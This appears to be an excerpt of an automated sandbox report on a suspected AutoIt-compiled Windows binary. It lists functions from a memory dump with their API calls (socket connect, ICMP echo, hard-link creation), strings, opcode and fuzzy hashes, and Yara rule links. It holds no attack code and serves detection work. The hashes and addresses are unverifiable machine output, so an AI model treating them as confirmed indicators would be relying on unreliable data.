                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                            • String ID:
                            • API String ID: 245547762-0
                            • Opcode ID: ce173a5c11c6d7f77ffefdfe177aa4ae897abb8a3c61339767718f4a44cd8e6b
                            • Instruction ID: 59d28a7fb3f3a04dfd4558199b026ae18b91cb268184aa8a4e12a0e5a1b29b5b
                            • Opcode Fuzzy Hash: ce173a5c11c6d7f77ffefdfe177aa4ae897abb8a3c61339767718f4a44cd8e6b
                            • Instruction Fuzzy Hash: C5216A32200604AFD710EFA8DC4AFABB7E8EF45720F108649FA55D72D1CB70AC518BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD70BF, Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 00AD70FC
                            • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00AD713C
                            • SelectObject.GDI32(?,00000000), ref: 00AD714C
                            • BeginPath.GDI32(?), ref: 00AD7161
                            • SelectObject.GDI32(?,00000000), ref: 00AD718A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Object$Select$BeginCreateDeletePath
                            • String ID:
                            • API String ID: 2338827641-0
                            • Opcode ID: 662af35dd816a3299767b1763fb0d2bd91c05e1225692ff33f4aa0f3ff8f6dc1
                            • Instruction ID: c208b5d5762a3a10d23d06048cd090d27e5e81ff22fa340654d6e978cb58d631
                            • Opcode Fuzzy Hash: 662af35dd816a3299767b1763fb0d2bd91c05e1225692ff33f4aa0f3ff8f6dc1
                            • Instruction Fuzzy Hash: FA214F71805315ABCB14DF68ED49A9E7BACEB09320F604357F925D32A0EF7099508BA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA50CF, Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AA1810: _doexit.LIBCMT ref: 00AA181C
                            • ___set_flsgetvalue.LIBCMT ref: 00AA50E0
                              • Part of subcall function 00AA77D1: TlsGetValue.KERNEL32(?,00AA792A,?,00AA12DC,?,00000001), ref: 00AA77DA
                              • Part of subcall function 00AA77D1: TlsSetValue.KERNEL32(00000000,?,00AA12DC,?,00000001), ref: 00AA77FB
                            • ___fls_getvalue@4.LIBCMT ref: 00AA50EB
                              • Part of subcall function 00AA77B1: TlsGetValue.KERNEL32(?,?,00AA3C50,00000000), ref: 00AA77BF
                            • ___fls_setvalue@8.LIBCMT ref: 00AA50FD
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00AA5106
                            • ExitThread.KERNEL32 ref: 00AA510D
                            • __freefls@4.LIBCMT ref: 00AA5129
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                            • String ID:
                            • API String ID: 4247068974-0
                            • Opcode ID: e818e1f6de36774ea561e0b86b9808e40b77cb8829eaf98a4d64777cc9c36510
                            • Instruction ID: 7f8a0ff5c7ff48ab2101c80c804d28e7210a306ee7a997b3b269a31df89419f9
                            • Opcode Fuzzy Hash: e818e1f6de36774ea561e0b86b9808e40b77cb8829eaf98a4d64777cc9c36510
                            • Instruction Fuzzy Hash: 57E0EC35C042056BDF1237B1AE1AEAF3A6D5E46740B504820B911930A3EF28896186A9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADE0FF, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID: \
                            • API String ID: 4104443479-2967466578
                            • Opcode ID: 0b03ecf3bc3b8d5516c9a60bb204d168f5cd21f3b6f617fd1fe09ea8fc51481b
                            • Instruction ID: ad6ccbe5b139f8a0203ad16b34d44f2e44123da8f855402e71d228e5610054c6
                            • Opcode Fuzzy Hash: 0b03ecf3bc3b8d5516c9a60bb204d168f5cd21f3b6f617fd1fe09ea8fc51481b
                            • Instruction Fuzzy Hash: 33B1AF70E04249CFDB15DFA8C894BEDBBB2BF59304F28826AE052AF391D3755942CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADE0F6, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID: \
                            • API String ID: 4104443479-2967466578
                            • Opcode ID: c2a0823cad986f2e71a1dc82b1604de1fbdfa200d0b3997ab8fbf4ff4be8b172
                            • Instruction ID: 80d7fdf351712e9afc29c9f40e0bca30b8c9a9e184f114c73384b4c52122fb92
                            • Opcode Fuzzy Hash: c2a0823cad986f2e71a1dc82b1604de1fbdfa200d0b3997ab8fbf4ff4be8b172
                            • Instruction Fuzzy Hash: C5B1BF70E04249CFDB15DFA8C894BEDBBB2BF59304F28826AE052AF391D3355942CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADE10F, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID: \
                            • API String ID: 4104443479-2967466578
                            • Opcode ID: d1674a556e562a1ad86c80e1041b15e0870cb90953e34f735efd205838f105ee
                            • Instruction ID: 6b9d4c0f7faae5523de0d104483f31804cc0d3f4b8341ba47e144c178bc6a389
                            • Opcode Fuzzy Hash: d1674a556e562a1ad86c80e1041b15e0870cb90953e34f735efd205838f105ee
                            • Instruction Fuzzy Hash: AFA1AF70E04249CFDB15DFA8C894BEDBBB2BF59304F28816AE052AF391D3755942CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADF0AD, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID: \$]$h
                            • API String ID: 4104443479-3262404753
                            • Opcode ID: 03f9ade20a024513ca8df49aec30e87a138459ba33d8d51d79fe54e6241c4870
                            • Instruction ID: 8abf977776c7669f3bca62d8ae384936c6f51189aae425cf378533c3a2e6e237
                            • Opcode Fuzzy Hash: 03f9ade20a024513ca8df49aec30e87a138459ba33d8d51d79fe54e6241c4870
                            • Instruction Fuzzy Hash: BC513070E002499FCF18CF69C9909AEB7F6BF99314F28826AE416AB354D7309E45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC11F9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00AC120B
                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 00AC121D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: ICMP.DLL$IcmpSendEcho
                            • API String ID: 2574300362-58917771
                            • Opcode ID: 4fddccc9b266d6a6a5dca4c6e8b2af41837dde589b3c126ec074aeec06c53452
                            • Instruction ID: b7e207d648a59bc4218f24349466e67d6294101286ba91c9e2dbc4fc532c4133
                            • Opcode Fuzzy Hash: 4fddccc9b266d6a6a5dca4c6e8b2af41837dde589b3c126ec074aeec06c53452
                            • Instruction Fuzzy Hash: 65E01275900306DFD7205F95F804EC6B7D8DB15761F408429E955D3551DB74E49086A8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B0812C, Relevance: 6.2, APIs: 4, Instructions: 176COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00A91D10: _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00A91D10: _memmove.LIBCMT ref: 00A91D57
                            • SetErrorMode.KERNEL32 ref: 00B08188
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B08341
                              • Part of subcall function 00AC397D: GetFileAttributesW.KERNELBASE(?), ref: 00AC3984
                            • SetErrorMode.KERNEL32(?), ref: 00B0822A
                            • SetErrorMode.KERNEL32(?), ref: 00B082FA
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorMode$AttributesFile_memmove_wcslen
                            • String ID:
                            • API String ID: 3884216118-0
                            • Opcode ID: 96acb123f8b8025a2a646a7cca016296aa3c96c3adaa768c24db0091deb70dec
                            • Instruction ID: 89dec8f0360464e066aed197e07b37edfcece1a6986e37bd944af3a1ead2487c
                            • Opcode Fuzzy Hash: 96acb123f8b8025a2a646a7cca016296aa3c96c3adaa768c24db0091deb70dec
                            • Instruction Fuzzy Hash: 9C617A726083419BC710EF28C981A5BBBE0FF89714F04895DF9895B392CB72ED45CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA407F, Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                            • String ID:
                            • API String ID: 2782032738-0
                            • Opcode ID: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
                            • Instruction ID: 299e91b3b862ecf76e35b47136b71515df26d526bdeac2c1c88a2d719d76ed57
                            • Opcode Fuzzy Hash: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
                            • Instruction Fuzzy Hash: 4941D231A007049BDB258FA9C9846AFBBB5AFDA360F24862CF515972C0D7F4DE91DB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AED19C, Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00AED235
                            • GetLastError.KERNEL32(?,00000000), ref: 00AED259
                            • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 00AED279
                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00AED297
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CreateHardLink$DeleteErrorFileLast
                            • String ID:
                            • API String ID: 3321077145-0
                            • Opcode ID: ff925095004deefef8a85aff12c09ba05c52a021839c903b919e492ca0da7036
                            • Instruction ID: bb9b60c1f361416acdbb6cfc6e5539b6045d801bf6d48cada6a25c55ee669d4c
                            • Opcode Fuzzy Hash: ff925095004deefef8a85aff12c09ba05c52a021839c903b919e492ca0da7036
                            • Instruction Fuzzy Hash: E23182B6A00241ABCF10EF66CA89E5AB7E8FF45310F148949F8449B352CB74ED51C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC0165, Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                            Download Yara Rule
                            APIs
                            • CreateWindowExW.USER32 ref: 00AC01AF
                            • GetStockObject.GDI32(00000011), ref: 00AC01C5
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AC01CF
                            • ShowWindow.USER32(00000000,00000000), ref: 00AC01EA
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Window$CreateMessageObjectSendShowStock
                            • String ID:
                            • API String ID: 1358664141-0
                            • Opcode ID: be131b530f0ca55e9516b7a609db8317d82e868b56afcee5a8d857452c0a3018
                            • Instruction ID: 423921c2d270fdcf834c55427a179bdfc768cb08dc8336bdf41159b19a49acc4
                            • Opcode Fuzzy Hash: be131b530f0ca55e9516b7a609db8317d82e868b56afcee5a8d857452c0a3018
                            • Instruction Fuzzy Hash: EB113072200644BBD715CF69DC45FDBB7A9AF88B10F198309FA08932A0D774E851CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA506D, Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                            Download Yara Rule
                            APIs
                            • __getptd_noexit.LIBCMT ref: 00AA5070
                              • Part of subcall function 00AA7913: GetLastError.KERNEL32(00000003,?,00AA7994,?,00AA1259,?,?,00AA12DC,?,00000001), ref: 00AA7917
                              • Part of subcall function 00AA7913: ___set_flsgetvalue.LIBCMT ref: 00AA7925
                              • Part of subcall function 00AA7913: __calloc_crt.LIBCMT ref: 00AA7939
                              • Part of subcall function 00AA7913: GetCurrentThreadId.KERNEL32 ref: 00AA7969
                              • Part of subcall function 00AA7913: SetLastError.KERNEL32(00000000,?,00AA12DC,?,00000001), ref: 00AA7981
                            • CloseHandle.KERNEL32(?,?,00AA50BB), ref: 00AA5084
                            • __freeptd.LIBCMT ref: 00AA508B
                            • ExitThread.KERNEL32 ref: 00AA5093
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                            • String ID:
                            • API String ID: 1454798553-0
                            • Opcode ID: 46d08bef33b881d592685315e9217cb8bf7ccb64447b1f09137f8a191cc70541
                            • Instruction ID: c2a32b31f7f33e030ffafc03da3f28df0c7f366b6bc97567404e1fa86a0ea885
                            • Opcode Fuzzy Hash: 46d08bef33b881d592685315e9217cb8bf7ccb64447b1f09137f8a191cc70541
                            • Instruction Fuzzy Hash: 65D0A932805E206FC2356334AC0DB5F33699F42B31B144B00F4358B4D2CF28CE5286E8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF907F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00A91D10: _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00A91D10: _memmove.LIBCMT ref: 00A91D57
                            • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00AF90EB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: MessageSend_memmove_wcslen
                            • String ID: ComboBox$ListBox
                            • API String ID: 547829025-1403004172
                            • Opcode ID: 1c62544ccf608febaea2bf920f4a50ad8f5ee2234dbe2b82e9a78db81537abd7
                            • Instruction ID: 331b6658bafef74cbbf4b2fbcfa9d06cad318d62aba1ba969489f474d1e290ca
                            • Opcode Fuzzy Hash: 1c62544ccf608febaea2bf920f4a50ad8f5ee2234dbe2b82e9a78db81537abd7
                            • Instruction Fuzzy Hash: B001F572B1111977CF10BAA99C45BEFBB9CDB45320F008057FA189B282CE349A8583E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC2175, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __fread_nolock_memmove
                            • String ID: EA06
                            • API String ID: 1988441806-3962188686
                            • Opcode ID: 2fd21c40c6326d5796edbf5cfb6af6f1f7df482eaede14336e252a029163de0f
                            • Instruction ID: 020bd1ef9d22d611425e3e672aee290781de7fc8725ab4bb095e037577852ccc
                            • Opcode Fuzzy Hash: 2fd21c40c6326d5796edbf5cfb6af6f1f7df482eaede14336e252a029163de0f
                            • Instruction Fuzzy Hash: C70149329042187BCB18DBA88C12FFEBBF49F45301F04859DF596932C1D674A618C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE6069, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 00AE6075
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • wsprintfW.USER32 ref: 00AE60A1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: MessageSend_mallocwsprintf
                            • String ID: %d/%02d/%02d
                            • API String ID: 1262938277-328681919
                            • Opcode ID: fe8050e23838d777b88514e64567d2353eba4a475eacfc6c7bb7b3e1f1e97f26
                            • Instruction ID: 4d9f9c11e8cac25b8243a3b0a179035327b8c9933d2f103a885dc6c406420553
                            • Opcode Fuzzy Hash: fe8050e23838d777b88514e64567d2353eba4a475eacfc6c7bb7b3e1f1e97f26
                            • Instruction Fuzzy Hash: E4F0A77274022866D7109BD9BC46FFEB3E8DB59B53F404167FA04EA1C0D66A4860C3F1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC704A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                            Download Yara Rule
                            APIs
                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AC7058
                              • Part of subcall function 00AA17FA: _doexit.LIBCMT ref: 00AA1806
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Message_doexit
                            • String ID: AutoIt$Error allocating memory.
                            • API String ID: 1993061046-4017498283
                            • Opcode ID: 6c6be0c78e72b51a38bc2cc987d562ea9e55006b3022af7a2fa50402684902c9
                            • Instruction ID: 85eb69d3a85725fd3c179dcba4d624103fd602785419d5ba4a8b690aa3a6b26a
                            • Opcode Fuzzy Hash: 6c6be0c78e72b51a38bc2cc987d562ea9e55006b3022af7a2fa50402684902c9
                            • Instruction Fuzzy Hash: C4B012323C030476E10C27A00E0BFC62040A705F0AF900494B3152A0E34BC104E045E1
                            Uniqueness

                            Uniqueness Score: -1.00%